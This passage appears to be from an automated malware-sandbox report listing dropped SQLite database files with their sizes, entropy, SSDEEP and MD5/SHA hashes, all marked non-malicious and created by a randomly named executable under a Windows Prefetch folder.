                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.8439810553697228
                                                            Encrypted:false
                                                            SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                            MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                            SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                            SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                            SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):40960
                                                            Entropy (8bit):0.8553638852307782
                                                            Encrypted:false
                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.6732424250451717
                                                            Encrypted:false
                                                            SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                            MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                            SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                            SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                            SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5707520969659783
                                                            Encrypted:false
                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                            Category:dropped
                                                            Size (bytes):51200
                                                            Entropy (8bit):0.8746135976761988
                                                            Encrypted:false
                                                            SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                            MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                            SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                            SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                            SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):20480
                                                            Entropy (8bit):0.5712781801655107
                                                            Encrypted:false
                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                            Category:dropped
                                                            Size (bytes):106496
                                                            Entropy (8bit):1.136413900497188
                                                            Encrypted:false
                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                            MD5:429F49156428FD53EB06FC82088FD324
                                                            SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                            SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                            SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.121297215059106
                                                            Encrypted:false
                                                            SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                            MD5:D87270D0039ED3A5A72E7082EA71E305
                                                            SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                            SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                            SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                            Malicious:false
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\Prefetch\ReadyBoot\PfjsOcNiQfAmiszo.exe
